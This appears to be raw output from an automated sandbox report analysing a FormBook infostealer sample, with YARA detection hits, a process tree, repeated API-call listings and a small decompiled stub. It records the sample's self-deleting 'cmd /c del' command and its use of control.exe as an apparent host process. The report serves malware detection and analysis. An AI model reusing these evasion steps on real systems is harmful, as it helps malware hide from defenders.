                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  General

                                                                  Start time:15:46:49
                                                                  Start date:12/05/2021
                                                                  Path:C:\Windows\explorer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:
                                                                  Imagebase:0x7ff6fee60000
                                                                  File size:3933184 bytes
                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:15:47:10
                                                                  Start date:12/05/2021
                                                                  Path:C:\Windows\SysWOW64\control.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\control.exe
                                                                  Imagebase:0x3c0000
                                                                  File size:114688 bytes
                                                                  MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:moderate

                                                                  General

                                                                  Start time:15:47:14
                                                                  Start date:12/05/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:/c del 'C:\Users\user\Desktop\350969bc_by_Libranalysis.exe'
                                                                  Imagebase:0x11d0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:15:47:14
                                                                  Start date:12/05/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff724c50000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >

                                                                    Executed Functions

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 55df195301975a54411b3cd48df820dc3a00d9703ade706442f318eaed99b11f
                                                                    • Instruction ID: 5f0e90d51a6abb3e1168305008cf05c8550a236f4743bcc70c8b6fbb6cf8a3d4
                                                                    • Opcode Fuzzy Hash: 55df195301975a54411b3cd48df820dc3a00d9703ade706442f318eaed99b11f
                                                                    • Instruction Fuzzy Hash: D8B19870B006069FCB14EF79C494AAEBBF6FF88314B108A69C44ADB751DB34E905CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 01866BF8
                                                                    • GetCurrentThread.KERNEL32 ref: 01866C35
                                                                    • GetCurrentProcess.KERNEL32 ref: 01866C72
                                                                    • GetCurrentThreadId.KERNEL32 ref: 01866CCB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Current$ProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2063062207-0
                                                                    • Opcode ID: 789e9558747cc510eb3ade320b6af34e0ed13c6f5013bd4122d2c451782947cd
                                                                    • Instruction ID: a438cee47d2d139e9fbd06a31f7c7c9f67f72f70e830863be63de8d950575f74
                                                                    • Opcode Fuzzy Hash: 789e9558747cc510eb3ade320b6af34e0ed13c6f5013bd4122d2c451782947cd
                                                                    • Instruction Fuzzy Hash: DB5167B49006498FDB14DFAAD548BDEBBF0FF48314F2085A9E019A7360D7745948CF65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 01866BF8
                                                                    • GetCurrentThread.KERNEL32 ref: 01866C35
                                                                    • GetCurrentProcess.KERNEL32 ref: 01866C72
                                                                    • GetCurrentThreadId.KERNEL32 ref: 01866CCB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Current$ProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2063062207-0
                                                                    • Opcode ID: 250869cd7759e4fe49cd9c563e1f6719f04a343a18aab39a32e8f807676daef6
                                                                    • Instruction ID: ead330e4498871490377f45e65d92c4414a6e39d553a34c40baaea00004bae3d
                                                                    • Opcode Fuzzy Hash: 250869cd7759e4fe49cd9c563e1f6719f04a343a18aab39a32e8f807676daef6
                                                                    • Instruction Fuzzy Hash: 9B5176B49006498FDB14DFAAD5487DEBBF4FF48314F208469E019A3360DB74A988CF65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0186BE0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 8d7e48a01acf618366462179497e66c6fc9caa7bb9693ad8d32cbb80a117df87
                                                                    • Instruction ID: c3515236ccacb49ecbdbd21eed960ad61c0b83503372a725065b4138ae9615ee
                                                                    • Opcode Fuzzy Hash: 8d7e48a01acf618366462179497e66c6fc9caa7bb9693ad8d32cbb80a117df87
                                                                    • Instruction Fuzzy Hash: 67813570A00B058FD725DF2AD44175ABBF5FF88318F00892AD586DBA51DB35EA09CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0186DD8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 30884e6ee4bec2df26e2bda66178a38b11598d74a81e17b9fac77d102f4b47aa
                                                                    • Instruction ID: 41389f20e7d1609f59c56cafe8365d15be124fb19e170f0e05b9d5c36ba7e310
                                                                    • Opcode Fuzzy Hash: 30884e6ee4bec2df26e2bda66178a38b11598d74a81e17b9fac77d102f4b47aa
                                                                    • Instruction Fuzzy Hash: 4C51B0B1D00309DFDB15CFA9D980ADEBFB5BF48314F24862AE819AB210D7749945CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0186DD8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 0d53701868848827be8d9f07ea457654a246d36636435b565f623eed78894063
                                                                    • Instruction ID: 5482a398842290a652c0af2a6edcac2439f419263d1efa39c96b00e45edb3724
                                                                    • Opcode Fuzzy Hash: 0d53701868848827be8d9f07ea457654a246d36636435b565f623eed78894063
                                                                    • Instruction Fuzzy Hash: 5441A0B1D00309EFDB15DF9AD884ADEBFB5BF48314F24862AE819AB210D7749945CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01866E47
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 9f150d2c95089db5b18a90a5d0b294cebf78945649c5ce2bd0f1aa68cc2572c0
                                                                    • Instruction ID: 7af628332a267a91c10ff74c7f883c0d0ef787597ac935406ac40e24f31e64cc
                                                                    • Opcode Fuzzy Hash: 9f150d2c95089db5b18a90a5d0b294cebf78945649c5ce2bd0f1aa68cc2572c0
                                                                    • Instruction Fuzzy Hash: 3A415A75900249AFCB11CFA9D884ADEBFF9FB49310F18805AE944A7311D7359A14CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01866E47
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 005a3c4f60f2f1598feae47c87b1fbbd7739e8bb2015026c49be95786b809504
                                                                    • Instruction ID: 94513a8be74b9d59313110f629dbc5a23c9943cf5b09f344916d4d4dba8e5de9
                                                                    • Opcode Fuzzy Hash: 005a3c4f60f2f1598feae47c87b1fbbd7739e8bb2015026c49be95786b809504
                                                                    • Instruction Fuzzy Hash: 2A21D2B5901249DFDB10CFAAD984ADEBBF8FB48324F24851AE914B3310D375A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01866E47
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 70190ada28244521c99b8e1aa836104a092b7af29554da2fb56d5df482a62386
                                                                    • Instruction ID: 3c00e8d6bb7406ebf33e0aaf2de3be54217bc6417978d366eed8a86743d08a06
                                                                    • Opcode Fuzzy Hash: 70190ada28244521c99b8e1aa836104a092b7af29554da2fb56d5df482a62386
                                                                    • Instruction Fuzzy Hash: 2721C4B59012499FDB10CFAAD984ADEBBF8EB48324F14841AE914B3310D774A944CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0186BE89,00000800,00000000,00000000), ref: 0186C09A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: e725c6512427c7fcc76b5194df791d7da5b46c529f7b6ec5fd1d0fc403c075c5
                                                                    • Instruction ID: b7b4e35555ecc06f71d93d2907c5593a17de2781b35f7982af61c99183bceeea
                                                                    • Opcode Fuzzy Hash: e725c6512427c7fcc76b5194df791d7da5b46c529f7b6ec5fd1d0fc403c075c5
                                                                    • Instruction Fuzzy Hash: FB1114B69002099FDB14CF9AD444BDEFBF8EB49324F00842AD555B7700C775AA49CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0186BE89,00000800,00000000,00000000), ref: 0186C09A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: d2bacdbcb3d1d85d3cf2bf6d74efde72f47fc3e5baa5286c2068f542b8345a01
                                                                    • Instruction ID: db395bfe4a2b21a83b778e762c7e96f54bf30a1965bdbd7f8600b81ea0f121ec
                                                                    • Opcode Fuzzy Hash: d2bacdbcb3d1d85d3cf2bf6d74efde72f47fc3e5baa5286c2068f542b8345a01
                                                                    • Instruction Fuzzy Hash: D51133B6D002098FDB10CFAAC484BDEFBF8AB89314F10851AD515B7600C775A549CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0186BE0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 10142fa553ec54dd46796bee6cb1243e4c71760cfdcffe2495e9980646d7d751
                                                                    • Instruction ID: 07c2b5dce24ce2f2804884dc3feb6e153413eaedebbfe22d9c03db1b3637730d
                                                                    • Opcode Fuzzy Hash: 10142fa553ec54dd46796bee6cb1243e4c71760cfdcffe2495e9980646d7d751
                                                                    • Instruction Fuzzy Hash: B011E0B6D002498FDB14CF9AD844BDEFBF8EB88324F14851AD919B7610C378A645CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,?,?), ref: 0186DF1D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID:
                                                                    • API String ID: 1378638983-0
                                                                    • Opcode ID: 49d6a618ae6f52dc42996f0745cab858fc950a8b47c02138bb13c1e8fa7ed91c
                                                                    • Instruction ID: 3708f24fdb09177ae79e3cf2d3ceda3507b8173581c07cae400c26c1feb64fca
                                                                    • Opcode Fuzzy Hash: 49d6a618ae6f52dc42996f0745cab858fc950a8b47c02138bb13c1e8fa7ed91c
                                                                    • Instruction Fuzzy Hash: DC11E2B59002099FDB10CF9AD585BDEBBF8EB48324F10851AE955B7700C374AA44CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,?,?), ref: 0186DF1D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID:
                                                                    • API String ID: 1378638983-0
                                                                    • Opcode ID: 6b844f9d107b8cae1a7fd912adfd44298ddc88536562695bfb5fa01689ec0acf
                                                                    • Instruction ID: dcff13d32fc52a63d4747b1685f2bac26f9ba2acb68ef2647f56c4b5c376c330
                                                                    • Opcode Fuzzy Hash: 6b844f9d107b8cae1a7fd912adfd44298ddc88536562695bfb5fa01689ec0acf
                                                                    • Instruction Fuzzy Hash: C711E5BA900209CFDB10CF99D585BDEBBF8EB48324F15851AD555B7700C378A944CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8639db580dfbb326b1fb18cceb924dfd566c4d72f529a4c4d9c0d2ada922f3d0
                                                                    • Instruction ID: e63b7c2f2ecbb2ebfb3d7d11400c0ab0ed0d3629f1d88760c8aab311825a83d3
                                                                    • Opcode Fuzzy Hash: 8639db580dfbb326b1fb18cceb924dfd566c4d72f529a4c4d9c0d2ada922f3d0
                                                                    • Instruction Fuzzy Hash: B85218B1501706CFD730CF5CE8C859DBBB1FB45328B914219D1A1ABA99D3B8678ACF84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 55b0af864bdfd3d4935051108cab77b075b7be0331c54578d0f722fe63264475
                                                                    • Instruction ID: 6f46cf6f5677eb2f1b89b4acff89c4bccc508e62c7d48d39c6085046957eb05d
                                                                    • Opcode Fuzzy Hash: 55b0af864bdfd3d4935051108cab77b075b7be0331c54578d0f722fe63264475
                                                                    • Instruction Fuzzy Hash: A6A17D32E0061A8FCF15DFA9C9445DEBBB6FF85304B15816AE905FB265EB31EA05CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 84a268e5b349a82353e44db69ea0dc63a2ed8200f83e5e077727341b2facf84f
                                                                    • Instruction ID: 7f21be650e457134c0b6810fb1e8c6eab0ebd313cbd60f91fa4af6f300763ae6
                                                                    • Opcode Fuzzy Hash: 84a268e5b349a82353e44db69ea0dc63a2ed8200f83e5e077727341b2facf84f
                                                                    • Instruction Fuzzy Hash: 4B614970E0520A9FCB04CFA9D491AAEFBB6BB89354F14C025D624EB254D734DA41CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ff23e90c109a398b4d3405808d1d278f2f49bd4b3a9d11f98dc165397914b373
                                                                    • Instruction ID: 37394627ae2a8a793bed25640ba5c66b661fba14f68ccc6d220090d314e2c8cf
                                                                    • Opcode Fuzzy Hash: ff23e90c109a398b4d3405808d1d278f2f49bd4b3a9d11f98dc165397914b373
                                                                    • Instruction Fuzzy Hash: 08614770E0520A9FCB04CFA9D491AAEFBF6BB89310F14C425D625EB255D734EA41CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Executed Functions

                                                                    C-Code - Quality: 37%
                                                                    			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                    				void* _t18;
                                                                    				void* _t27;
                                                                    				intOrPtr* _t28;
                                                                    
                                                                    				_t13 = _a4;
                                                                    				_t28 = _a4 + 0xc48;
                                                                    				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                    				_t6 =  &_a32; // 0x413d52
                                                                    				_t12 =  &_a8; // 0x413d52
                                                                    				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                    				return _t18;
                                                                    			}






                                                                    0x00418273
                                                                    0x0041827f
                                                                    0x00418287
                                                                    0x00418292
                                                                    0x004182ad
                                                                    0x004182b5
                                                                    0x004182b9

                                                                    APIs
                                                                    • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID: R=A$R=A
                                                                    • API String ID: 2738559852-3742021989
                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                    • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                    • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                    • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                    • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: c32f5796ddaf866f59db34fea60258a467219aa5b305847553aa14afb13a1566
                                                                    • Instruction ID: 385ed3339d784c7e7a876af1a96ddb15dfafd44966e5bf625854e63aa509c44e
                                                                    • Opcode Fuzzy Hash: c32f5796ddaf866f59db34fea60258a467219aa5b305847553aa14afb13a1566
                                                                    • Instruction Fuzzy Hash: F301BBB2204108AFCB08CF98DC95EEB37A9AF9C354F15824CFA0DD7251D630E851CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                    • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                    • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: 05de2879a2fc0fae214c25d7b9897b399c80e918a92176773526dbc11e9f5f11
                                                                    • Instruction ID: ce5480904a668c4d927718b093031cb1577561652f4e279af9e5e15bade548e6
                                                                    • Opcode Fuzzy Hash: 05de2879a2fc0fae214c25d7b9897b399c80e918a92176773526dbc11e9f5f11
                                                                    • Instruction Fuzzy Hash: BCF01CB5200118ABDB14DF89DC81EE777A9EF88354F15864DFE1997281C630E811CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                    • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                    • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                    • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                    • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 0e66ef57ee4c6d8aaaa42c7b4bf260577db3d7e0d72030048e528aa598718bb2
                                                                    • Instruction ID: b7e012df7334e707b9f99e4aa8eaf45e74de95ba84de21aa1b2f5a42d17ce743
                                                                    • Opcode Fuzzy Hash: 0e66ef57ee4c6d8aaaa42c7b4bf260577db3d7e0d72030048e528aa598718bb2
                                                                    • Instruction Fuzzy Hash: 0E900265711004030105A59A0704507004AA7D5395351C022F1405551CDB7188616162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
